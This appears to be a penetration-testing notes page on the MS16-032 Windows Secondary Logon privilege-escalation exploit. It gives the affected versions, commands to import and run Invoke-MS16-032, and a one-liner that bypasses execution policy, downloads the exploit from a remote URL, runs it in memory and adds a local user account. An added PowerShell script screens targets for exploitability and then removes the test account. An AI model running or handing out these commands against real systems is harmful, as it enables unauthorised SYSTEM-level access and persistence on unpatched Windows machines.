The Secondary Logon Service in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 does not properly process request handles, which allows local users to gain privileges via a crafted application, aka "Secondary Logon Elevation of Privilege Vulnerability."
Product | CPU Architecture | Version | Update | Tested
---|---|---|---|---
Windows 10 | | | |
Windows 10 | | 1511 | |
Windows 7 | x64 | | SP1 | ✔
Windows 8.1 | | | |
Windows RT 8.1 | | | |
Windows Server 2008 | | | SP2 | ✔
Windows Server 2008 | x64 | R2 | SP1 | ✔
Windows Server 2012 | | | |
Windows Server 2012 | | R2 | |
Windows Vista | | | SP2 |
The target system needs at least 2 logical CPU cores: the exploit wins a race condition against the Secondary Logon service, and the race does not succeed on a single-core machine (add a core to the VM if necessary).
PowerShell script test, run with the following commands on Windows Server 2008 R2 SP1 x64:

```powershell
Import-Module .\Invoke-MS16-032.ps1
Invoke-MS16-032
```
The script can also be fetched from a remote URL and run in a single command; here the elevated process adds a local account instead of spawning a shell:

```powershell
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user ascotbe test6666 /add'"
```
(Demonstration GIF of the exploit run; the image is not reproduced in this text.)
The compiled EXE was tested against both the x64 and x86 builds of the listed versions; only the Windows 7 SP1 x64 run is recorded here.
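Before running either the script or the EXE on a candidate target, it is worth checking the preconditions named above (core count, a usable Secondary Logon service, an unpatched OS) and, afterwards, confirming and cleaning up the account the one-liner creates. The following PowerShell is an added example written for this page; it is not part of Invoke-MS16-032 or the Ridter repository. It assumes the fix KB for the pre-Windows-10 systems is KB3139914 (the MS16-032 bulletin number), and that the test account name is the `ascotbe` used in the command above; both are stated as assumptions in the code.

```powershell
# Added example for this page (not from Invoke-MS16-032 or the Ridter repo).
# Pre-flight check for an MS16-032 test run, plus post-run verification/cleanup.

function Test-MS16032Preconditions {
    [CmdletBinding()]
    param(
        # Assumption: KB3139914 is the MS16-032 hotfix on Vista/7/8.1/2008/2012.
        [string]$FixKB = 'KB3139914'
    )
    $r = [ordered]@{}

    # 1. The race condition needs at least two logical processors.
    $r.LogicalProcessors = (Get-WmiObject Win32_ComputerSystem).NumberOfLogicalProcessors
    $r.EnoughCores = ($r.LogicalProcessors -ge 2)

    # 2. The exploit goes through CreateProcessWithLogonW, which is serviced by
    #    the Secondary Logon service (seclogon). It is normally Manual start,
    #    which is fine; a Disabled service means the call will fail.
    $svc = Get-Service -Name seclogon -ErrorAction SilentlyContinue
    $mode = if ($svc) { (Get-WmiObject Win32_Service -Filter "Name='seclogon'").StartMode } else { 'Missing' }
    $r.SecLogonStatus    = if ($svc) { $svc.Status.ToString() } else { 'Missing' }
    $r.SecLogonStartMode = $mode
    $r.SecLogonUsable    = ($svc -ne $null -and $mode -ne 'Disabled')

    # 3. OS build and architecture, to compare against the affected-version table.
    $os = Get-WmiObject Win32_OperatingSystem
    $r.OSCaption    = $os.Caption
    $r.OSVersion    = $os.Version
    $r.Architecture = $os.OSArchitecture

    # 4. Has the fix already been applied? Only conclusive before Windows 10:
    #    Windows 10 ships the fix inside cumulative updates, so a missing KB
    #    there proves nothing.
    $r.FixInstalled          = ((Get-HotFix -Id $FixKB -ErrorAction SilentlyContinue) -ne $null)
    $r.HotfixCheckConclusive = ($os.Version -notlike '10.*')

    # 5. The script needs PowerShell v2 or later.
    $r.PSVersion = $PSVersionTable.PSVersion.ToString()

    $r.LikelyExploitable = $r.EnoughCores -and $r.SecLogonUsable -and
                           $r.HotfixCheckConclusive -and -not $r.FixInstalled
    return [pscustomobject]$r
}

# Post-run check: did the elevated 'net user ... /add' actually create the account?
function Test-MS16032Result {
    param([string]$UserName = 'ascotbe')   # assumption: account name from the one-liner
    $acct = Get-WmiObject Win32_UserAccount -Filter "LocalAccount=True AND Name='$UserName'"
    return ($acct -ne $null)
}

# Remove the test account once the run has been recorded (needs an elevated shell).
function Remove-MS16032TestUser {
    param([string]$UserName = 'ascotbe')
    if (Test-MS16032Result -UserName $UserName) {
        net user $UserName /delete | Out-Null
        return -not (Test-MS16032Result -UserName $UserName)
    }
    return $true
}

Test-MS16032Preconditions | Format-List
```

Run `Test-MS16032Preconditions` first and only proceed when `LikelyExploitable` is true; on Windows 10 compare the build against the table instead of trusting the hotfix check. After the exploit, `Test-MS16032Result` confirms the account exists, and `Remove-MS16032TestUser` deletes it so the test box is left as it was found.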